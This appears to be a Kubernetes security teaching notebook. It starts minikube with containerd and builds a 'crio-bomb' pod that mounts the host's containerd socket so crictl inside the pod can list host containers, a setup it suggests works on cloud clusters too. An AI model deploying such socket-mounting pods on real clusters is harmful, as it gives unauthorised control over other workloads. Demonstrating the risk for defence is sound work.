**This notebook is covered by the following [license](License.ipynb)  This note must not be removed**

# Start minikube with containerd

In [85]:
minikube start --vm-driver=docker   \
   --container-runtime=containerd 


😄  minikube v1.6.2 on Ubuntu 18.04
✨  Selecting 'none' driver from user configuration (alternates: [kvm2])
⚠️  Using the 'containerd' runtime with the 'none' driver is an untested configuration!
💡  Tip: Use 'minikube start -p <name>' to create a new cluster, or 'minikube delete' to delete this one.
🔄  Starting existing none VM for "minikube" ...
⌛  Waiting for the host to be provisioned ...
📦  Preparing Kubernetes v1.17.0 on containerd 1.2.6-0ubuntu1~18.04.2 ...
    ▪ kubelet.resolv-conf=/etc/resolv.conf.google
🚀  Launching Kubernetes ... 
🤹  Configuring local host environment ...

⚠️  The 'none' driver provides limited isolation and may reduce system security and reliability.
⚠️  For more information, see:
👉  https://minikube.sigs.k8s.io/docs/reference/drivers/none/

🏄  Done! kubectl is now configured to use "minikube"


In [1]:
crictl ps

CONTAINER           IMAGE                                                                                                     CREATED             STATE               NAME                        ATTEMPT             POD ID
3231821b23dbe       octarinesec/kubescan-scanner@sha256:7dd0c0a4b2a14f2eff1131c0a1b4a3c379fe8e01d829365a3a92b3ad24255de9      12 minutes ago      Running             kube-scan                   0                   d1bee846cba21
e8d815981f305       octarinesec/kubescan-scanner-ui@sha256:d7923d67da1ecc652f9d2dcff27fb1c0c1da4a4f497b341c09e0506c32e144b8   12 minutes ago      Running             kube-scan-ui                0                   d1bee846cba21
8f94c7648f338       nginxinc/nginx-unprivileged@sha256:937e9244ee1973b33e79a429b78218291407e42cc4e28754c8d78e3b4b491cdc       40 minutes ago      Running             nginx                       0                   c4f3ab95b29d9
9091ca0e7ba1a       nginxinc/nginx-unprivileged@sha256:937e9244ee1973b33e79a429b78218291407e42c

Same approach, we need `crictl.yaml`, a statically linked `crictl` and a `busybox` image

```yaml
runtime-endpoint: unix:///run/containerd/containerd.sock
image-endpoint: unix:///run/containerd/containerd.sock
timeout: 10
debug: false
```

```Dockerfile
FROM busybox
COPY crictl /usr/bin/crictl
COPY crictl.yaml /etc/crictl.yaml

ENTRYPOINT sh -c  'while /usr/bin/crictl ps ; do sleep 5 ; clear; done'
```

Deploy with 

```yaml
apiVersion: v1
kind: Pod
metadata:
 name: crio-bomb
spec:
 containers:
 - image: crio-bomb
   name: crio-bomb
   volumeMounts:
   - mountPath: /run/containerd
     name: run-containerd
 volumes:
 - name:  run-containerd
   hostPath: 
     path: /run/containerd
```


[Can been applied to a cloud](CrioBomb.ipynb)
### probably to all ☠️☠️☠️